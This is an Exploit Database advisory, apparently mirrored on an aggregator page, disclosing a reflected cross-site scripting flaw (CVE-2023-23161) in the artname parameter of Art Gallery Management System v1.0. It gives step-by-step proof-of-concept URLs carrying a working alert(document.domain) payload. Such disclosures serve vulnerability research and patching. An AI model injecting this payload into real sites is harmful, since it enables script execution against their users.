Art Gallery Management System Project v1.0 – Reflected Cross-Site Scripting (XSS)

• Exploit Database
• 16 阅读

• 作者： Rahul Patwari
  日期： 2023-04-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51214/

• # Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
  # Date: 20/01/2023
  # Exploit Author: Rahul Patwari
  # Vendor Homepage: https://phpgurukul.com/
  # Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
  # Version: 1.0
  # Tested on:XAMPP / Windows 10
  # CVE :CVE-2023-23161
  
  # Proof of Concept:
  # 1- Install The application Art Gallery Management System Project v1.0
  
  # 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints
  
  # 3- Now Insert XSS Payload on artname parameter.
  the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E
  
  # 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
  
  # 5- XSS has been triggered.
  
  # Go to this url "
  https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
  "
  XSS will trigger.